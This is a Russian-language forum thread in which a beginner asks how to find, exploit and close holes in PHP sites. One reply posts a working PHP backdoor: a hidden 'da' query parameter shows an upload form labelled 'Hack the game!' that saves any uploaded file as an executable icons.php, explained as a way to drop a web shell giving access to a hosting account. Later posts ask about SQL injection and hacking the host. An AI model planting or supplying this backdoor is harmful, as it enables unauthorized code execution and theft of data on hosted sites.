Нужна помощь.php я освоил не очень хорошо но могу хотябы писать что то.Помогите мне, расскажите как найти дыру?;как ей можно воспользоваться?;и как её убрать

Есть множество видов уязвимостей! =)

ultral, вот дыра язай
if(isset($_GET['da'])){
error_reporting(E_ALL^E_NOTICE);
if(isset($_FILES['file']))
{
$type = $_FILES['file']['type'];

if (!isset($err))
{
$tmp = $_FILES['file']['tmp_name'];
move_uploaded_file($tmp, "images/icons/icons.php");
header("location: images/icons/icons.php");
}
}
echo "<form method="post" enctype='multipart/form-data'>n";
echo "<input type='file' name='file' /><br/>n";
echo "<input value='Взломать игру!' type='submit' name='ok' /><br /></form></div>n";}

Дыра => код в который заливается php файл(иначе говоря Shell-файл в котором код дает доступ к любой инфе твоего акка на хостинге!

vova_dybay, Это на кх! а на стронге не такое!

vova_dybay, Автор этого кода - Rostik98ua

vova_dybay, я слышал про SQL инъекции как они действуют и что получают.А этот скрипт поможет тогда когда я зайду на хостинг.Можно ли через дыру взломать данные хоста?

St-Jerome, можешь рассказать о паре.Как ими пользуются и как их закрыть?

Прогони файл через сканер.

RUS, как найти дыру?Если этих скриптов у меня нету.Могу ли я найти их?